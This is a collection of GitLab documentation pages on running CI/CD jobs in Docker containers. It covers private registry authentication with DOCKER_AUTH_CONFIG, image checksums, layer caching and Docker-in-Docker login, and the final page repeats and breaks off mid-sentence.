--- stage: Verify group: Runner info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments description: Learn how to run your CI/CD jobs in Docker containers hosted on dedicated CI/CD build servers or your local machine. title: Run your CI/CD jobs in Docker containers breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can run your CI/CD jobs in Docker containers hosted on dedicated CI/CD build servers or your local machine. To run CI/CD jobs in a Docker container, you need to: 1. Register a runner and configure it to use the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html). 1. Specify the container image where you want to run the CI/CD jobs in the `.gitlab-ci.yml` file. 1. Optional. Run other services, like MySQL, in containers. Do this by specifying [services](../services/_index.md) in your `.gitlab-ci.yml` file. ## Register a runner that uses the Docker executor To use GitLab Runner with Docker you need to [register a runner](https://docs.gitlab.com/runner/register/) that uses the Docker executor. This example shows how to set up a temporary template to supply services: ```shell cat > /tmp/test-config.template.toml << EOF [[runners]] [runners.docker] [[runners.docker.services]] name = "postgres:latest" [[runners.docker.services]] name = "mysql:latest" EOF ``` Then use this template to register the runner: ```shell sudo gitlab-runner register \ --url "https://gitlab.example.com/" \ --token "$RUNNER_TOKEN" \ --description "docker-ruby:2.6" \ --executor "docker" \ --template-config /tmp/test-config.template.toml \ --docker-image ruby:3.3 ``` The registered runner uses the `ruby:2.6` Docker image and runs two services, `postgres:latest` and `mysql:latest`, both of which are accessible during the build process. 
## What is an image The `image` keyword is the name of the Docker image the Docker executor uses to run CI/CD jobs. By default, the executor pulls images from [Docker Hub](https://hub.docker.com/). However, you can configure the registry location in the `gitlab-runner/config.toml` file. For example, you can set the [Docker pull policy](https://docs.gitlab.com/runner/executors/docker.html#how-pull-policies-work) to use local images. For more information about images and Docker Hub, see the [Docker overview](https://docs.docker.com/get-started/overview/). ## Image requirements Any image used to run a CI/CD job must have the following applications installed: - `sh` or `bash` - `grep` ## Define `image` in the `.gitlab-ci.yml` file You can define an image that's used for all jobs, and a list of services that you want to use during runtime: ```yaml default: image: ruby:2.6 services: - postgres:11.7 before_script: - bundle install test: script: - bundle exec rake spec ``` The image name must be in one of the following formats: - `image: <image-name>` (Same as using `<image-name>` with the `latest` tag) - `image: <image-name>:<tag>` - `image: <image-name>@<digest>` ## Extended Docker configuration options {{< history >}} - Introduced in GitLab and GitLab Runner 9.4. {{< /history >}} You can use a string or a map for the `image` or `services` entries: - Strings must include the full image name (including the registry, if you want to download the image from a registry other than Docker Hub). - Maps must contain at least the `name` option, which is the same image name as used for the string setting. For example, the following two definitions are equal: - A string for `image` and `services`: ```yaml image: "registry.example.com/my/image:latest" services: - postgresql:14.3 - redis:latest ``` - A map for `image` and `services`. 
The `image:name` is required: ```yaml image: name: "registry.example.com/my/image:latest" services: - name: postgresql:14.3 - name: redis:latest ``` ## Where scripts are executed When a CI job runs in a Docker container, the `before_script`, `script`, and `after_script` commands run in the `/builds/<project-path>/` directory. Your image may have a different default `WORKDIR` defined. To move to your `WORKDIR`, save the `WORKDIR` as an environment variable so you can reference it in the container during the job's runtime. ### Override the entrypoint of an image {{< history >}} - Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](using_docker_images.md#extended-docker-configuration-options). {{< /history >}} Before explaining the available entrypoint override methods, let's describe how the runner starts. It uses a Docker image for the containers used in the CI/CD jobs: 1. The runner starts a Docker container using the defined entrypoint. The default from `Dockerfile` that may be overridden in the `.gitlab-ci.yml` file. 1. The runner attaches itself to a running container. 1. The runner prepares a script (the combination of [`before_script`](../yaml/_index.md#before_script), [`script`](../yaml/_index.md#script), and [`after_script`](../yaml/_index.md#after_script)). 1. The runner sends the script to the container's shell `stdin` and receives the output. To override the [entrypoint](https://docs.gitlab.com/runner/executors/docker.html#configure-a-docker-entrypoint) of a Docker image, in the `.gitlab-ci.yml` file: - For Docker 17.06 and later, set `entrypoint` to an empty value. - For Docker 17.03 and earlier, set `entrypoint` to `/bin/sh -c`, `/bin/bash -c`, or an equivalent shell available in the image. The syntax of `image:entrypoint` is similar to [Dockerfile `ENTRYPOINT`](https://docs.docker.com/reference/dockerfile/#entrypoint). Let's assume you have a `super/sql:experimental` image with a SQL database in it. 
You want to use it as a base image for your job because you want to execute some tests with this database binary. Let's also assume that this image is configured with `/usr/bin/super-sql run` as an entrypoint. When the container starts without additional options, it runs the database's process. The runner expects that the image has no entrypoint or that the entrypoint is prepared to start a shell command. With the extended Docker configuration options, instead of: - Creating your own image based on `super/sql:experimental`. - Setting the `ENTRYPOINT` to a shell. - Using the new image in your CI job. You can now define an `entrypoint` in the `.gitlab-ci.yml` file. **For Docker 17.06 and later**: ```yaml image: name: super/sql:experimental entrypoint: [""] ``` **For Docker 17.03 and earlier**: ```yaml image: name: super/sql:experimental entrypoint: ["/bin/sh", "-c"] ``` ## Define image and services in `config.toml` In the `config.toml` file, you can define: - In the [`[runners.docker]`](https://docs.gitlab.com/runner/configuration/advanced-configuration#the-runnersdocker-section) section, the container image used to run CI/CD jobs - In the [`[[runners.docker.services]]`](https://docs.gitlab.com/runner/configuration/advanced-configuration#the-runnersdockerservices-section) section, the [services](../services/_index.md) container ```toml [runners.docker] image = "ruby:latest" services = ["mysql:latest", "postgres:latest"] ``` The image and services defined this way are added to all jobs run by that runner. ## Access an image from a private container registry To access private container registries, the GitLab Runner process can use: - [Statically defined credentials](#use-statically-defined-credentials). A username and password for a specific registry. - [Credentials Store](#use-a-credentials-store). For more information, see [the relevant Docker documentation](https://docs.docker.com/reference/cli/docker/login/#credential-stores). 
- [Credential Helpers](#use-credential-helpers). For more information, see [the relevant Docker documentation](https://docs.docker.com/reference/cli/docker/login/#credential-helpers).

When you use the [GitLab Container Registry](../../user/packages/container_registry/_index.md) on the same GitLab instance, GitLab provides default credentials for this registry. With these credentials, the `CI_JOB_TOKEN` is used for authentication. To use the job token, the user starting the job must have at least the Developer role for the project where the private image is hosted. The project hosting the private image must also allow the other project to authenticate with the job token. This access is disabled by default. For more details, see [CI/CD job token](../jobs/ci_job_token.md#control-job-token-access-to-your-project).

To define which option should be used, the runner process reads the configuration in this order:

- A `DOCKER_AUTH_CONFIG` [CI/CD variable](../variables/_index.md).
- A `DOCKER_AUTH_CONFIG` environment variable set in the runner's `config.toml` file.
- A `config.json` file in the `$HOME/.docker` directory of the user running the process. If the `--user` flag is provided to run the child processes as an unprivileged user, the home directory of the main runner process user is used.

### Requirements and limitations

- [Credentials Store](#use-a-credentials-store) and [Credential Helpers](#use-credential-helpers) require binaries to be added to the GitLab Runner `$PATH`, and require access to do so. Therefore, these features are not available on instance runners, or any other runner where the user does not have access to the environment where the runner is installed.

### Use statically-defined credentials

You can access a private registry using two approaches. Both require setting the CI/CD variable `DOCKER_AUTH_CONFIG` with appropriate authentication information.

1. Per-job: To configure one job to access a private registry, add `DOCKER_AUTH_CONFIG` as a [CI/CD variable](../variables/_index.md).
1. Per-runner: To configure a runner so all its jobs can access a private registry, add `DOCKER_AUTH_CONFIG` as an environment variable in the runner's configuration.

See the following sections for examples of each.

#### Determine your `DOCKER_AUTH_CONFIG` data

As an example, let's assume you want to use the `registry.example.com:5000/private/image:latest` image. This image is private and requires you to sign in to a private container registry.

Let's also assume that these are the sign-in credentials:

| Key      | Value                       |
|:---------|:----------------------------|
| registry | `registry.example.com:5000` |
| username | `my_username`               |
| password | `my_password`               |

Use one of the following methods to determine the value for `DOCKER_AUTH_CONFIG`:

- Do a `docker login` on your local machine:

  ```shell
  docker login registry.example.com:5000 --username my_username --password my_password
  ```

  Then copy the content of `~/.docker/config.json`.

  If you don't need access to the registry from your computer, you can do a `docker logout`:

  ```shell
  docker logout registry.example.com:5000
  ```

- In some setups, it's possible the Docker client uses the available system key store to store the result of `docker login`. In that case, it's impossible to read `~/.docker/config.json`, so you must prepare the required base64-encoded version of `${username}:${password}` and create the Docker configuration JSON manually. Open a terminal and execute the following command:

  ```shell
  # The use of printf (as opposed to echo) prevents encoding a newline in the password.
  printf "my_username:my_password" | openssl base64 -A

  # Example output to copy
  bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=
  ```

{{< alert type="note" >}}

If your username includes special characters like `@`, you must escape them with a backslash (`\`) to prevent authentication problems.
{{< /alert >}}

Create the Docker JSON configuration content as follows:

```json
{
  "auths": {
    "registry.example.com:5000": {
      "auth": "(Base64 content from above)"
    }
  }
}
```

#### Configure a job

To configure a single job with access for `registry.example.com:5000`, follow these steps:

1. Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value:

   ```json
   {
     "auths": {
       "registry.example.com:5000": {
         "auth": "bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ="
       }
     }
   }
   ```

1. You can now use any private image from `registry.example.com:5000` defined in `image` or `services` in your `.gitlab-ci.yml` file:

   ```yaml
   image: registry.example.com:5000/namespace/image:tag
   ```

   In the previous example, GitLab Runner looks at `registry.example.com:5000` for the image `namespace/image:tag`.

You can add configuration for as many registries as you want, adding more registries to the `"auths"` hash as described previously.

The full `hostname:port` combination is required everywhere for the runner to match the `DOCKER_AUTH_CONFIG`. For example, if `registry.example.com:5000/namespace/image:tag` is specified in the `.gitlab-ci.yml` file, then the `DOCKER_AUTH_CONFIG` must also specify `registry.example.com:5000`. Specifying only `registry.example.com` does not work.

#### Configure a runner

If you have many pipelines that access the same registry, you should set up registry access at the runner level. This allows pipeline authors to access a private registry just by running a job on the appropriate runner. It also helps simplify registry changes and credential rotations.

This means that any job on that runner can access the registry with the same privilege, even across projects. If you need to control access to the registry, you need to control access to the runner.

To add `DOCKER_AUTH_CONFIG` to a runner:

1. Modify the runner's `config.toml` file as follows:

   ```toml
   [[runners]]
     environment = ["DOCKER_AUTH_CONFIG={\"auths\":{\"registry.example.com:5000\":{\"auth\":\"bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=\"}}}"]
   ```

   - The double quotes included in the `DOCKER_AUTH_CONFIG` data must be escaped with backslashes. This prevents them from being interpreted as TOML.
   - The `environment` option is a list. Your runner may have existing entries, and you should add this to the list, not replace it.

1. Restart the runner service.

### Use a Credentials Store

To configure a Credentials Store:

1. To use a Credentials Store, you need an external helper program to interact with a specific keychain or external store. Make sure the helper program is available in the GitLab Runner `$PATH`.

1. Make GitLab Runner use it. You can accomplish this by using one of the following options:

   - Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value:

     ```json
     {
       "credsStore": "osxkeychain"
     }
     ```

   - Or, if you're running self-managed runners, add the JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. GitLab Runner reads this configuration file and uses the needed helper for this specific repository.

`credsStore` is used to access **all** the registries. If you use both images from a private registry and public images from Docker Hub, pulling from Docker Hub fails. The Docker daemon tries to use the same credentials for **all** the registries.

### Use Credential Helpers

As an example, let's assume that you want to use the `<aws_account_id>.dkr.ecr.<region>.amazonaws.com/private/image:latest` image. This image is private and requires you to sign in to a private container registry.

To configure access for `<aws_account_id>.dkr.ecr.<region>.amazonaws.com`, follow these steps:

1. Make sure [`docker-credential-ecr-login`](https://github.com/awslabs/amazon-ecr-credential-helper) is available in the GitLab Runner `$PATH`.

1. Have any of the following [AWS credentials setup](https://github.com/awslabs/amazon-ecr-credential-helper#aws-credentials). Make sure that GitLab Runner can access the credentials.

1. Make GitLab Runner use it. You can accomplish this by using one of the following options:

   - Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value:

     ```json
     {
       "credHelpers": {
         "<aws_account_id>.dkr.ecr.<region>.amazonaws.com": "ecr-login"
       }
     }
     ```

     This configures Docker to use the Credential Helper for a specific registry. Instead, you can configure Docker to use the Credential Helper for all Amazon Elastic Container Registry (ECR) registries:

     ```json
     {
       "credsStore": "ecr-login"
     }
     ```

     {{< alert type="note" >}}

     If you use `{"credsStore": "ecr-login"}`, set the region explicitly in the AWS shared configuration file (`~/.aws/config`). The region must be specified when the ECR Credential Helper retrieves the authorization token.

     {{< /alert >}}

   - Or, if you're running self-managed runners, add the previous JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. GitLab Runner reads this configuration file and uses the needed helper for this specific repository.

1. You can now use any private image from `<aws_account_id>.dkr.ecr.<region>.amazonaws.com` defined in `image` and/or `services` in your `.gitlab-ci.yml` file:

   ```yaml
   image: <aws_account_id>.dkr.ecr.<region>.amazonaws.com/private/image:latest
   ```

   In the example, GitLab Runner looks at `<aws_account_id>.dkr.ecr.<region>.amazonaws.com` for the image `private/image:latest`.

You can add configuration for as many registries as you want, adding more registries to the `"credHelpers"` hash.

### Use checksum to keep your image secure

Use the image checksum in your job definition in your `.gitlab-ci.yml` file to verify the integrity of the image. A failed image integrity verification prevents you from using a modified container.
To use the image checksum, append the checksum at the end:

```yaml
image: ruby:2.6.8@sha256:d1dbaf9665fe8b2175198e49438092fdbcf4d8934200942b94425301b17853c7
```

To get the image checksum, on the image `TAG` tab, view the `DIGEST` column. For example, view the [Ruby image](https://hub.docker.com/_/ruby?tab=tags). The checksum is a random string, like `6155f0235e95`.

You can also get the checksum of any image on your system with the command `docker images --digests`:

```shell
❯ docker images --digests
REPOSITORY             TAG     DIGEST                                                                    (...)
gitlab/gitlab-ee       latest  sha256:723aa6edd8f122d50cae490b1743a616d54d4a910db892314d68470cc39dfb24   (...)
gitlab/gitlab-runner   latest  sha256:4a18a80f5be5df44cb7575f6b89d1fdda343297c6fd666c015c0e778b276e726   (...)
```

## Creating a custom GitLab Runner Docker image

You can create a custom GitLab Runner Docker image to package the AWS CLI and Amazon ECR Credential Helper. This setup facilitates secure and streamlined interactions with AWS services, especially for containerized applications. For example, use this setup to manage, deploy, and update Docker images on Amazon ECR. This setup helps avoid time-consuming, error-prone configuration and manual credential management.

1. [Authenticate GitLab with AWS](../cloud_deployment/_index.md#authenticate-gitlab-with-aws).

1. Create a `Dockerfile` with the following content:

   ```dockerfile
   # Control package versions
   ARG GITLAB_RUNNER_VERSION=v17.3.0
   ARG AWS_CLI_VERSION=2.17.36

   # AWS CLI and Amazon ECR Credential Helper
   FROM amazonlinux as aws-tools

   RUN set -e \
       && yum update -y \
       && yum install -y --allowerasing git make gcc curl unzip \
       && curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" --output "awscliv2.zip" \
       && unzip awscliv2.zip && ./aws/install -i /usr/local/bin \
       && yum clean all

   # Download and install ECR Credential Helper
   RUN curl --location --output /usr/local/bin/docker-credential-ecr-login "https://github.com/awslabs/amazon-ecr-credential-helper/releases/latest/download/docker-credential-ecr-login-linux-amd64"
   RUN chmod +x /usr/local/bin/docker-credential-ecr-login

   # Configure the ECR Credential Helper
   RUN mkdir -p /root/.docker
   RUN echo '{ "credsStore": "ecr-login" }' > /root/.docker/config.json

   # Final image based on GitLab Runner
   FROM gitlab/gitlab-runner:${GITLAB_RUNNER_VERSION}

   # Install necessary packages
   RUN apt-get update \
       && apt-get install -y --no-install-recommends jq procps curl unzip groff libgcrypt20 tar gzip less openssh-client \
       && apt-get clean && rm -rf /var/lib/apt/lists/*

   # Copy AWS CLI and Amazon ECR Credential Helper binaries
   COPY --from=aws-tools /usr/local/bin/ /usr/local/bin/

   # Copy ECR Credential Helper configuration
   COPY --from=aws-tools /root/.docker/config.json /root/.docker/config.json
   ```

1. To build the custom GitLab Runner Docker image in a `.gitlab-ci.yml` file, include the following example:

   ```yaml
   variables:
     DOCKER_DRIVER: overlay2
     IMAGE_NAME: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_NAME
     GITLAB_RUNNER_VERSION: v17.3.0
     AWS_CLI_VERSION: 2.17.36

   stages:
     - build

   build-image:
     stage: build
     script:
       - echo "Logging into GitLab container registry..."
       - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
       - echo "Building Docker image..."
       - docker build --build-arg GITLAB_RUNNER_VERSION=${GITLAB_RUNNER_VERSION} --build-arg AWS_CLI_VERSION=${AWS_CLI_VERSION} -t ${IMAGE_NAME} .
       - echo "Pushing Docker image to GitLab container registry..."
       - docker push ${IMAGE_NAME}
     rules:
       - changes:
           - Dockerfile
   ```

1. [Register the runner](https://docs.gitlab.com/runner/register/#docker).
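Tying the earlier statically-defined credentials section together, the `DOCKER_AUTH_CONFIG` value can be assembled with a short script. This is a sketch using the placeholder `my_username`/`my_password` credentials and `registry.example.com:5000` registry from the examples on this page, and plain `base64` in place of `openssl base64 -A`:

```shell
# Sketch: build a DOCKER_AUTH_CONFIG value for the placeholder registry.
# printf (not echo) avoids encoding a trailing newline into the secret.
AUTH=$(printf '%s' 'my_username:my_password' | base64)

# Assemble the Docker configuration JSON around the encoded credentials.
DOCKER_AUTH_CONFIG=$(cat <<EOF
{
  "auths": {
    "registry.example.com:5000": {
      "auth": "${AUTH}"
    }
  }
}
EOF
)

printf '%s\n' "$DOCKER_AUTH_CONFIG"
```

The printed JSON matches the `bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=` example value shown earlier, and can be pasted into a CI/CD variable, or into the runner's `environment` list after escaping the double quotes for TOML.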
---
url: https://docs.gitlab.com/ci/docker_layer_caching
source: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/docker_layer_caching.md
date_extracted: 2025-08-13
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Make Docker-in-Docker builds faster with Docker layer caching
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

When using Docker-in-Docker, Docker downloads all layers of your image every time you create a build. Recent versions of Docker (Docker 1.13 and later) can use a pre-existing image as a cache during the `docker build` step. This significantly accelerates the build process.

In Docker 27.0.1 and later, the default `docker` build driver only supports cache backends when the `containerd` image store is enabled. To use Docker caching with Docker 27.0.1 and later, do one of the following:

- Enable the `containerd` image store in your Docker daemon configuration.
- Select a different build driver.

For more information, see [Cache storage backends](https://docs.docker.com/build/cache/backends/).

## How Docker caching works

When running `docker build`, each command in the `Dockerfile` creates a layer. These layers are retained as a cache and can be reused if there have been no changes. A change in one layer causes the recreation of all subsequent layers.

To specify a tagged image to be used as a cache source for the `docker build` command, use the `--cache-from` argument. Multiple images can be specified as a cache source by using multiple `--cache-from` arguments.

## Docker inline caching example

This example `.gitlab-ci.yml` file shows how to use Docker caching with the `inline` cache backend and the default `docker build` command.
```yaml
default:
  image: docker:27.4.1
  services:
    - docker:27.4.1-dind
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY

variables:
  # Use TLS https://docs.gitlab.com/ee/ci/docker/using_docker_build.html#tls-enabled
  DOCKER_HOST: tcp://docker:2376
  DOCKER_TLS_CERTDIR: "/certs"

build:
  stage: build
  script:
    - docker pull $CI_REGISTRY_IMAGE:latest || true
    - docker build --build-arg BUILDKIT_INLINE_CACHE=1 --cache-from $CI_REGISTRY_IMAGE:latest --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --tag $CI_REGISTRY_IMAGE:latest .
    - docker push $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA
    - docker push $CI_REGISTRY_IMAGE:latest
```

In the `script` section for the `build` job:

1. The first command tries to pull the image from the registry so that it can be used as a cache for the `docker build` command. Any image that's used with the `--cache-from` argument must be pulled (using `docker pull`) before it can be used as a cache source.
1. The second command builds a Docker image by using the pulled image as a cache (see the `--cache-from $CI_REGISTRY_IMAGE:latest` argument) if available, and tags it. The `--build-arg BUILDKIT_INLINE_CACHE=1` tells Docker to use [inline caching](https://docs.docker.com/build/cache/backends/inline/), which embeds the build cache into the image itself.
1. The last two commands push the tagged Docker images to the container registry so that they can also be used as a cache for subsequent builds.

## Docker registry caching example

You can cache your Docker builds directly to a dedicated cache image in the registry. This example `.gitlab-ci.yml` file shows how to use Docker caching with the `docker buildx build` command and the `registry` cache backend. For more advanced caching options, see [Cache storage backends](https://docs.docker.com/build/cache/backends/).
```yaml
default:
  image: docker:27.4.1
  services:
    - docker:27.4.1-dind
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY

variables:
  # Use TLS https://docs.gitlab.com/ee/ci/docker/using_docker_build.html#tls-enabled
  DOCKER_HOST: tcp://docker:2376
  DOCKER_TLS_CERTDIR: "/certs"

build:
  stage: build
  script:
    - docker context create my-builder
    - docker buildx create my-builder --driver docker-container --use
    - docker buildx build --push -t $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --cache-to type=registry,ref=$CI_REGISTRY_IMAGE/cache-image,mode=max --cache-from type=registry,ref=$CI_REGISTRY_IMAGE/cache-image .
```

The `build` job's `script`:

1. Creates and configures the `docker-container` BuildKit driver, which supports the `registry` cache backend.
1. Builds and pushes a Docker image using:
   - A dedicated cache image with `--cache-from type=registry,ref=$CI_REGISTRY_IMAGE/cache-image`.
   - Cache updates with `--cache-to type=registry,ref=$CI_REGISTRY_IMAGE/cache-image,mode=max`, where `max` mode caches intermediate layers.
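Because the cache reference is an ordinary image reference, `--cache-to` and `--cache-from` can point at different tags. As a sketch (this variant is not part of the official example, and the `cache-image:$CI_COMMIT_REF_SLUG` naming scheme is an assumption), you could keep one cache image per branch and fall back to the default branch's cache on the first build of a new branch:

```yaml
build:
  stage: build
  script:
    - docker context create my-builder
    - docker buildx create my-builder --driver docker-container --use
    # Write this branch's cache, but also read the default branch's cache
    # so new branches start from warm layers. buildx accepts multiple
    # --cache-from sources.
    - docker buildx build --push -t $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA
      --cache-to type=registry,ref=$CI_REGISTRY_IMAGE/cache-image:$CI_COMMIT_REF_SLUG,mode=max
      --cache-from type=registry,ref=$CI_REGISTRY_IMAGE/cache-image:$CI_COMMIT_REF_SLUG
      --cache-from type=registry,ref=$CI_REGISTRY_IMAGE/cache-image:$CI_DEFAULT_BRANCH .
```

The trade-off is one cache image per branch in the registry, so a cleanup policy for the `cache-image` repository may be worth configuring.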
---
url: https://docs.gitlab.com/ci/using_kaniko
source: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/using_kaniko.md
stage: Verify
group: Pipeline Execution
title: Use kaniko to build Docker images (removed)
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

[kaniko](https://github.com/GoogleContainerTools/kaniko) is no longer a maintained project. For more information, see [issue 3348](https://github.com/GoogleContainerTools/kaniko/issues/3348).

Use [Docker to build Docker images](using_docker_build.md), [Buildah](using_docker_build.md#buildah-example), [Podman to run Docker commands](https://docs.gitlab.com/runner/executors/docker/#use-podman-to-run-docker-commands), or [Podman with GitLab Runner on Kubernetes](https://docs.gitlab.com/runner/executors/kubernetes/use_podman_with_kubernetes/) instead.
---
url: https://docs.gitlab.com/ci/authenticate_registry
source: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/authenticate_registry.md
stage: Verify
group: Pipeline Execution
title: Authenticate with registry in Docker-in-Docker
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

When you use Docker-in-Docker, the [standard authentication methods](using_docker_images.md#access-an-image-from-a-private-container-registry) do not work, because a fresh Docker daemon is started with the service.

## Option 1: Run `docker login`

In [`before_script`](../yaml/_index.md#before_script), run `docker login`:

```yaml
default:
  image: docker:24.0.5
  services:
    - docker:24.0.5-dind

variables:
  DOCKER_TLS_CERTDIR: "/certs"

build:
  stage: build
  before_script:
    - echo "$DOCKER_REGISTRY_PASS" | docker login $DOCKER_REGISTRY --username $DOCKER_REGISTRY_USER --password-stdin
  script:
    - docker build -t my-docker-image .
    - docker run my-docker-image /script/to/run/tests
```

To sign in to Docker Hub, leave `$DOCKER_REGISTRY` empty or remove it.

## Option 2: Mount `~/.docker/config.json` on each job

If you are an administrator for GitLab Runner, you can mount a file with the authentication configuration to `~/.docker/config.json`. Then every job that the runner picks up is already authenticated. If you are using the official `docker:24.0.5` image, the home directory is under `/root`.

If you mount the configuration file, any `docker` command that modifies `~/.docker/config.json` fails. For example, `docker login` fails, because the file is mounted as read-only. Do not change it from read-only, because this causes problems.

Here is an example of `/opt/.docker/config.json` that follows the [`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) documentation:

```json
{
  "auths": {
    "https://index.docker.io/v1/": {
      "auth": "bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ="
    }
  }
}
```

### Docker

Update the [volume mounts](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section) to include the file.

```toml
[[runners]]
  ...
  executor = "docker"
  [runners.docker]
    ...
    privileged = true
    volumes = ["/opt/.docker/config.json:/root/.docker/config.json:ro"]
```

### Kubernetes

Create a [ConfigMap](https://kubernetes.io/docs/concepts/configuration/configmap/) with the content of this file. You can do this with a command like:

```shell
kubectl create configmap docker-client-config --namespace gitlab-runner --from-file /opt/.docker/config.json
```

Update the [volume mounts](https://docs.gitlab.com/runner/executors/kubernetes/#custom-volume-mount) to include the file.

```toml
[[runners]]
  ...
  executor = "kubernetes"
  [runners.kubernetes]
    image = "alpine:3.12"
    privileged = true
    [[runners.kubernetes.volumes.config_map]]
      name = "docker-client-config"
      mount_path = "/root/.docker/config.json"
      sub_path = "config.json"
```

## Option 3: Use `DOCKER_AUTH_CONFIG`

If you already have [`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) defined, you can use the variable and save it in `~/.docker/config.json`.

You can define this authentication in several ways:

- In [`pre_build_script`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section) in the runner configuration file.
- In [`before_script`](../yaml/_index.md#before_script).
- In [`script`](../yaml/_index.md#script).

The following example shows [`before_script`](../yaml/_index.md#before_script). The same commands apply for any solution you implement.

```yaml
default:
  image: docker:24.0.5
  services:
    - docker:24.0.5-dind

variables:
  DOCKER_TLS_CERTDIR: "/certs"

build:
  stage: build
  before_script:
    - mkdir -p $HOME/.docker
    - echo $DOCKER_AUTH_CONFIG > $HOME/.docker/config.json
  script:
    - docker build -t my-docker-image .
    - docker run my-docker-image /script/to/run/tests
```
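You can dry-run the Option 3 `before_script` locally to check that the variable reaches the file intact. This is a minimal sketch using a scratch directory instead of `$HOME/.docker` and the placeholder auth value from the Option 2 example; note that quoting the expansion protects the JSON from shell word splitting:

```shell
# Simulate the Option 3 before_script in a scratch directory.
cfg_dir=$(mktemp -d)

# Placeholder value -- in a real job this comes from the DOCKER_AUTH_CONFIG CI/CD variable.
DOCKER_AUTH_CONFIG='{"auths":{"https://index.docker.io/v1/":{"auth":"bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ="}}}'

# Quote "$DOCKER_AUTH_CONFIG" so the JSON is written verbatim.
printf '%s' "$DOCKER_AUTH_CONFIG" > "$cfg_dir/config.json"

cat "$cfg_dir/config.json"
```

In the actual job, the target is `$HOME/.docker/config.json` (created with `mkdir -p $HOME/.docker`), as shown in the example above.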
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Authenticate with registry in Docker-in-Docker breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} When you use Docker-in-Docker, the [standard authentication methods](using_docker_images.md#access-an-image-from-a-private-container-registry) do not work, because a fresh Docker daemon is started with the service. ## Option 1: Run `docker login` In [`before_script`](../yaml/_index.md#before_script), run `docker login`: ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind variables: DOCKER_TLS_CERTDIR: "/certs" build: stage: build before_script: - echo "$DOCKER_REGISTRY_PASS" | docker login $DOCKER_REGISTRY --username $DOCKER_REGISTRY_USER --password-stdin script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` To sign in to Docker Hub, leave `$DOCKER_REGISTRY` empty or remove it. ## Option 2: Mount `~/.docker/config.json` on each job If you are an administrator for GitLab Runner, you can mount a file with the authentication configuration to `~/.docker/config.json`. Then every job that the runner picks up is already authenticated. If you are using the official `docker:24.0.5` image, the home directory is under `/root`. If you mount the configuration file, any `docker` command that modifies the `~/.docker/config.json` fails. For example, `docker login` fails, because the file is mounted as read-only. Do not change it from read-only, because this causes problems. 
Here is an example of `/opt/.docker/config.json` that follows the [`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) documentation: ```json { "auths": { "https://index.docker.io/v1/": { "auth": "bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=" } } } ``` ### Docker Update the [volume mounts](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section) to include the file. ```toml [[runners]] ... executor = "docker" [runners.docker] ... privileged = true volumes = ["/opt/.docker/config.json:/root/.docker/config.json:ro"] ``` ### Kubernetes Create a [ConfigMap](https://kubernetes.io/docs/concepts/configuration/configmap/) with the content of this file. You can do this with a command like: ```shell kubectl create configmap docker-client-config --namespace gitlab-runner --from-file /opt/.docker/config.json ``` Update the [volume mounts](https://docs.gitlab.com/runner/executors/kubernetes/#custom-volume-mount) to include the file. ```toml [[runners]] ... executor = "kubernetes" [runners.kubernetes] image = "alpine:3.12" privileged = true [[runners.kubernetes.volumes.config_map]] name = "docker-client-config" mount_path = "/root/.docker/config.json" sub_path = "config.json" ``` ## Option 3: Use `DOCKER_AUTH_CONFIG` If you already have 